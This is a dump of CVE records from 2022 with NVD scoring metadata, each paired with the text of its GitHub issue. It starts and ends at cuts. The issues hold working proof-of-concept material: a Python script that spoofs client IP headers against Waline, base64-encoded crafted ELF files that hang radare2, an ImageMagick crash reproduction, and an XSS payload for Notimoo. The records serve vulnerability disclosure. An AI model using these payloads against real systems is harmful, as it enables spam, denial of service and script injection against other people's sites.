/user/two-factor-recovery-codes`, show the recovery codes to the user, ask them to save them. 3. The user is asked to set up their authenticator app with this QR code and enter a resulting TOTP code. This confirms that they have set up their authenticator (else they cannot generate a valid code), and can also (by written explanation) be used as confirmation that recovery codes were stored in a safe place. 4. `POST /user/two-factor-authentication`, receives a new parameter: `code`. **The code is validated using the two factor secret stored in the session.** 5. If the code is valid, **the two factor secret from the session is written into the user table** (= enabling 2fa, now for real). If not, then the response indicates that the user did not enter a valid code and must re-try.
Current 2FA solution can lock users out of their accounts
https://api.github.com/repos/laravel/fortify/issues/201/comments
39
2021-01-17T19:39:15Z
2022-02-28T15:24:44Z
https://github.com/laravel/fortify/issues/201
787,778,846
201
3,238
CVE-2021-3596
2022-02-24T19:15:09.063
A NULL pointer dereference flaw was found in ImageMagick in versions prior to 7.0.10-31 in ReadSVGImage() in coders/svg.c. This issue is due to not checking the return value from libxml2's xmlCreatePushParserCtxt() and uses the value directly, which leads to a crash and segmentation fault.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1970569" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/2624" }, { "source": "secalert@redhat.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00018.html" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00008.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1970569" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/2624" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00018.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00008.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "5C99ED1A-DE49-4F83-B109-EE35F50E1717", "versionEndExcluding": "7.0.10-31", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:redhat:enterprise_linux:5.0:*:*:*:*:*:*:*", "matchCriteriaId": "1D8B549B-E57B-4DFE-8A13-CAB06B5356B3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/ImageMagick/ImageMagick/issues/2624
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [Y ] I have written a descriptive issue title - [Y] I have verified that I am using the latest version of ImageMagick - [Y] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported. ### Description <!-- A description of the bug or feature --> There is a segmentation fault caused by the NPD in function ReadSVGImage, svg.c:3621 in ImageMagick 7.0.10. ImageMagick does not check the nullity of the pointer returned from libxml2 and dereference it directly. This directly leads to program crashes and segmentation fault. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> 1, To ensure reproduce, I use up space in the /tmp folder as a low-level privilege user. For example, to facilitate the reproducation, ~~~~ fallocate -l size_of_the_tmp_folder /tmp/test.img ~~~~ 2, Run: ~~~~ magick convert poc ./test.ps ~~~~ [seg-svg3621.zip](https://github.com/ImageMagick/ImageMagick/files/5280857/seg-svg3621.zip) (unzip first) Here is the trace reported by ASAN: ~~~~ ASAN:SIGSEGV ================================================================= ==112350==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x0000009fec8c bp 0x62700001f900 sp 0x7ffd383e31c0 T0) #0 0x9fec8b in ReadSVGImage ../coders/svg.c:3621 #1 0xc8ba0c in ReadImage ../MagickCore/constitute.c:553 #2 0x8dfbc1 in ReadPESImage ../coders/pes.c:673 #3 0xc8ba0c in ReadImage ../MagickCore/constitute.c:553 #4 0xc8ecbc in ReadImages ../MagickCore/constitute.c:943 #5 0x12bfaef in ConvertImageCommand ../MagickWand/convert.c:607 #6 0x13fd865 in MagickCommandGenesis ../MagickWand/mogrify.c:191 #7 0x43992d in MagickMain ../utilities/magick.c:149 #8 0x7efd17fa982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #9 0x439168 in _start (/mnt/data/playground/ImageMagick/build-asan/utilities/magick+0x439168) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV ../coders/svg.c:3621 ReadSVGImage ==112350==ABORTING ~~~~ ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> ~~~~ CFLAGS='-I/usr/include/libxml2 -I/usr/include/libpng12 -I/usr/include/openjpeg-2.1 -I/usr/include/freetype2 -I/usr/include/freetype2 -fopenmp -Wall -O0 -g -fsanitize=address -mtune=broadwell -fexceptions -pthread -DMAGICKCORE_HDRI_ENABLE=1 -DMAGICKCORE_QUANTUM_DEPTH=16' ~~~~ - ImageMagick version: Version: ImageMagick 7.0.10-31 Q16 x86_64 2020-09-22 https://imagemagick.org Copyright: © 1999-2020 ImageMagick Studio LLC License: https://imagemagick.org/script/license.php Features: Cipher DPC HDRI OpenMP(4.0) Delegates (built-in): bzlib fontconfig freetype jng jp2 jpeg lzma png x xml zlib - Environment (Operating system, version and so on): DISTRIB_ID=Ubuntu DISTRIB_RELEASE=16.04 DISTRIB_CODENAME=xenial DISTRIB_DESCRIPTION="Ubuntu 16.04.6 LTS" - Additional information: <img width="1053" alt="image" src="https://user-images.githubusercontent.com/7632714/94231306-50f87b00-ff36-11ea-8d12-3e4aac41d28c.png"> Here is the link for the function xmlCreatePushParserCtxt in libxml2, which indicates the return value can be NULL if fails. https://gitlab.gnome.org/GNOME/libxml2/-/blob/master/parser.c#L12375 <img width="533" alt="image" src="https://user-images.githubusercontent.com/7632714/94231402-843b0a00-ff36-11ea-9eb0-ed51025e4671.png"> <!-- Thanks for reporting the issue to ImageMagick! -->
Null Pointer dereference caused by incomplete check of the return value from libxml2 in ReadSVGImage svg.c:3621
https://api.github.com/repos/ImageMagick/ImageMagick/issues/2624/comments
1
2020-09-25T05:56:46Z
2020-09-25T18:07:35Z
https://github.com/ImageMagick/ImageMagick/issues/2624
708,663,828
2,624
3,239
CVE-2021-4021
2022-02-24T19:15:09.533
A vulnerability was found in Radare2 in versions prior to 5.6.2, 5.6.0, 5.5.4 and 5.5.2. Mapping a huge section filled with zeros of an ELF64 binary for MIPS architecture can lead to uncontrolled resource consumption and DoS.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/issues/19436" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/issues/19436" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "matchCriteriaId": "C7E4E86C-9AD4-46E6-8403-6424D989E389", "versionEndExcluding": null, "versionEndIncluding": "5.5.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "834" ]
834
https://github.com/radareorg/radare2/issues/19436
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "radareorg", "radare2" ]
## Environment ``` $ date mar 23 nov 2021 10:31:32 -03 $ r2 -v radare2 5.5.0 1 @ linux-x86-64 git. commit: b50c2c35acd266f1b18bbbcfe0c63d9d0331b09d build: 2021-11-14__22:46:21 $ uname -ms Linux x86_64 ``` ## Description We found with @OctavioGalland an ELF64 binary for MIPS architecture that hangs when analysed. We think this is caused by mapping a huge section that is interpreted as NOPs. If we modify the size of the section, the analysis doesn't hang. While this is not an infinite loop, it can be very long. And this has been acknowledged as a DoS in the past (see #18923). ## Test ``` $ base64 -d <<< f0VMRgIBAQAAAACqqqqqqqqqCgABAAAAABBAAAAAAABAAAAAAAAAACAQAAAAAAAAAAAAAEAAOAABAEAAAwACAAEAAAABAAAABIAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAALAAAAD//////////wAAAAAAEAAA > hang $ base64 -d <<< f0VMRgIBAQAAAACqqqqqqqqqCgABAAAAABBAAAAAAABAAAAAAAAAACAQAAAAAAAAAAAAAEAAOAABAEAAAwACAAEAAAABAAAABIAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAALAAAAABAAAAAAAAAAAAAAAAEAAA > nohang ``` ``` $ r2 ./hang -- Beer in mind. [0x400000003f8ffc]> aaa [ ] Analyze all flags starting with sym. and entry0 (aa) ``` ``` $ readelf -l hang readelf: Error: Reading 192 bytes extends past end of file for section headers Elf file type is <unknown>: aaaa Entry point 0x401000 There is 1 program header, starting at offset 64 Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flags Align LOAD 0x0000000000008004 0x0040000000000000 0x0040000000000000 0x000000b000000000 0xffffffffffffffff E 0x100000000000 ``` ``` $ readelf -l nohang readelf: Error: Reading 192 bytes extends past end of file for section headers Elf file type is <unknown>: aaaa Entry point 0x401000 There is 1 program header, starting at offset 64 Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flags Align LOAD 0x0000000000008004 0x0040000000000000 0x0040000000000000 0x000000b000000000 0x0000000000000001 E 0x100000000000 readelf: Error: the segment's file size is larger than its memory size ``` ``` $ binwalk -W hang nohang OFFSET hang nohang -------------------------------------------------------------------------------- 0x00000000 7F 45 4C 46 02 01 01 00 00 00 00 AA AA AA AA AA |.ELF............| \ 7F 45 4C 46 02 01 01 00 00 00 00 AA AA AA AA AA |.ELF............| 0x00000010 AA AA 0A 00 01 00 00 00 00 10 40 00 00 00 00 00 |..........@.....| / AA AA 0A 00 01 00 00 00 00 10 40 00 00 00 00 00 |..........@.....| 0x00000020 40 00 00 00 00 00 00 00 20 10 00 00 00 00 00 00 |@...............| \ 40 00 00 00 00 00 00 00 20 10 00 00 00 00 00 00 |@...............| 0x00000030 00 00 00 00 40 00 38 00 01 00 40 00 03 00 02 00 |....@.8...@.....| / 00 00 00 00 40 00 38 00 01 00 40 00 03 00 02 00 |....@.8...@.....| 0x00000040 01 00 00 00 01 00 00 00 04 80 00 00 00 00 00 00 |................| \ 01 00 00 00 01 00 00 00 04 80 00 00 00 00 00 00 |................| 0x00000050 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 |......@.......@.| / 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 |......@.......@.| 0x00000060 00 00 00 00 B0 00 00 00 FF FF FF FF FF FF FF FF |................| \ 00 00 00 00 B0 00 00 00 01 00 00 00 00 00 00 00 |................| 0x00000070 00 00 00 00 00 10 00 00 XX XX XX XX XX XX XX XX |................| / 00 00 00 00 00 10 00 00 XX XX XX XX XX XX XX XX |................| ```
DoS analysing ELF64 binary for MIPS architecture
https://api.github.com/repos/radareorg/radare2/issues/19436/comments
3
2021-11-23T14:42:29Z
2021-12-03T00:57:37Z
https://github.com/radareorg/radare2/issues/19436
1,061,367,190
19,436
3,240
CVE-2022-24594
2022-02-25T12:15:07.667
In waline 1.6.1, an attacker can submit messages using X-Forwarded-For to forge any IP address.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/walinejs/waline/discussions/792" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/walinejs/waline/issues/785" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/walinejs/waline/discussions/792" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/walinejs/waline/issues/785" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:waline:waline:1.6.1:*:*:*:*:*:*:*", "matchCriteriaId": "3FAE4360-14FD-4778-98C5-965981912CA7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "862" ]
862
https://github.com/walinejs/waline/issues/785
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "walinejs", "waline" ]
### 问题描述 | Describe the bug # waline-fake-any-ip-poc A Proof-Of-Concept for the recently found [waline](https://github.com/walinejs/waline) fake any ip vulnerability. In this repository we have made and example vulnerable application and proof-of-concept (POC) exploit of it. ## Proof-of-concept (POC) As a PoC we have created a python file that automates the process. #### Requirements: ```bash pip install requests ``` #### Usage: ```bash python3 poc.py ``` #### Source: ```python ####### poc.py #======= Disclaimer: ========================================================================================# # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #===========================================================================================================# import requests import random def getRandStr(len): str="" dict = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" for i in range(len): str = str + random.choice(dict) return str attack_url = "https://waline-test-poc.vercel.app" # This is an attack url fake_ip = "This is a fake IP " + getRandStr(6) # This is a fake IP or any other string headers ={} headers['User-Agent']="Mozilla/5.0 test " + getRandStr(6) headers['X-Forwarded-For']= "0.0.0.0" headers['True-Client-IP']= fake_ip # fake ip data={ "comment": "test comment " + getRandStr(6), "nick": "test nick " + getRandStr(6), "mail": getRandStr(6) + "@test.com", "link": "https://" + getRandStr(6) + ".com", "ua": "Mozilla/5.0 test " + getRandStr(6), "url": "/", } res=requests.post(url = attack_url + "/comment", headers = headers, data = data) print(res.text) ``` #### Result: ![0](https://user-images.githubusercontent.com/98643060/155665193-5d2d7879-ee57-4bbd-b1d6-8f23e18ab0b3.png) #### Our vulnerable application waline deploy: - @waline/vercel 1.6.0 - @waline/client 1.5.2 data store: - LeannCloud get started: https://waline.js.org/guide/get-started.html #### Influence IP-based comment posting frequency limits IPQPS may be rendered useless. This vulnerability can be used to fake the IP address and bypass the IP frequency limit of the comment system software(waline), so that the comment system administrator cannot accurately obtain the IP address of the sender. #### Reason This vulnerability is usually caused by a misconfiguration on the server side. #### References - [#785](https://github.com/walinejs/waline/issues/785) - [#792](https://github.com/walinejs/waline/discussions/792) #### Exploit in the field According to the issues of Github of the project waline, from July 18 to July 20, 2021, an attacker bombarded all websites using Waline by Posting spam comments with faked IP addresses, so it is speculated that this vulnerability has been exploited in the field. - [#786](https://github.com/vuepress-theme-hope/vuepress-theme-hope/discussions/786) - [#430](https://github.com/walinejs/waline/issues/430) - [#424](https://github.com/walinejs/waline/issues/424) - [#427](https://github.com/walinejs/waline/discussions/427) #### Solutions Software maintainers have provided a solution to this vulnerability. There is nothing we can do about it on vercel. But we should be able to block these requests on a self hold env.(https://github.com/walinejs/waline/discussions/792#discussioncomment-2108838) In self host mode, we can set maxIpsCount to proxy server layers to get a real ip. https://koajs.com/#settings (https://github.com/walinejs/waline/discussions/792#discussioncomment-2109039) #### Disclaimer This repository is not intended to be a one-click exploit to waline fake any ip vulnerability. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications. Our team will not aid, or endorse any use of this exploit for malicious activity, thus if you ask for help you may be required to provide us with proof that you either own the target service or you have permissions to pentest on it. #### LICENSE ``` LICENSE BSD 3-Clause License Copyright (c) 2022, ihackerx All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ``` ### 问题网站 | Website URL https://waline.js.org ### 服务部署在哪里? | Where your waline deploy? Vercel (Default) ### 数据存储在哪里?| Where your comment data store? LeanCloud(https://leancloud.app)
[Bug]: waline fake any ip vulnerability
https://api.github.com/repos/walinejs/waline/issues/785/comments
7
2022-01-30T01:15:54Z
2022-03-13T09:26:09Z
https://github.com/walinejs/waline/issues/785
1,118,374,553
785
3,241
CVE-2022-24612
2022-02-25T12:15:07.713
An authenticated user can upload an XML file containing an XSS via the ITSM module of EyesOfNetwork 5.3.11, resulting in a stored XSS.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/EyesOfNetworkCommunity/eonweb/issues/114" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/EyesOfNetworkCommunity/eonweb/issues/114" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-11:*:*:*:*:*:*:*", "matchCriteriaId": "DBCEC519-5FE6-423B-919E-559F571B2152", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/EyesOfNetworkCommunity/eonweb/issues/114
[ "Exploit", "Third Party Advisory" ]
github.com
[ "EyesOfNetworkCommunity", "eonweb" ]
Hello, Il y a un petit soucis dans le contrôle des fichiers uploadés via le file upload du module ITSM. La possibilité d'uploader du format XML devrait se suivre d'un contrôle du dit fichier, en l'état il est possible d'uploader (via un user authentifié), un document XML contenant une XSS ou d'autres joyeusetées malicieuses. ![xss_eon](https://user-images.githubusercontent.com/61753065/152263357-ead4fd0d-b8d2-4a7c-ba2b-a88ba6d3e05d.png)
/!\Security
https://api.github.com/repos/EyesOfNetworkCommunity/eonweb/issues/114/comments
2
2022-02-03T00:58:30Z
2022-03-02T00:00:09Z
https://github.com/EyesOfNetworkCommunity/eonweb/issues/114
1,122,542,910
114
3,242
CVE-2021-42244
2022-02-25T19:15:12.703
A cross-site scripting (XSS) vulnerability in PaquitoSoftware Notimoo v1.2 allows attackers to execute arbitrary web scripts or HTML via a crafted title or message in a notification.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/PaquitoSoft/Notimoo/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/PaquitoSoft/Notimoo/issues/3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:notimoo_project:notimoo:1.2:*:*:*:*:*:*:*", "matchCriteriaId": "D6DEA6D3-6A74-4D85-9117-20519ED7B115", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/PaquitoSoft/Notimoo/issues/3
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "PaquitoSoft", "Notimoo" ]
notimoo.js 1.2 has an XSS vulnerability which is executed when a title or message containing Javascript code are set in a notification. ![image](https://user-images.githubusercontent.com/45259951/129262588-6bb16c4e-c2d7-4431-868a-bb40d49d0337.png) **POC** Create a notification with a javascript payload: ``` // Showing a simple notification notimooManager.show({ title: '<img src=x onerror=alert()>', message: 'This is a sample notitication showing how easy is to use Notimoo.' }); ``` Affected lines: - https://github.com/PaquitoSoft/Notimoo/blob/master/Source/Notimoo.js#L224 - https://github.com/PaquitoSoft/Notimoo/blob/master/Source/Notimoo.js#L225
XSS via title, message
https://api.github.com/repos/PaquitoSoft/Notimoo/issues/3/comments
0
2021-08-12T20:12:15Z
2021-08-12T20:12:15Z
https://github.com/PaquitoSoft/Notimoo/issues/3
969,490,590
3
3,243
CVE-2022-0764
2022-02-26T15:15:07.910
Arbitrary Command Injection in GitHub repository strapi/strapi prior to 4.1.0.
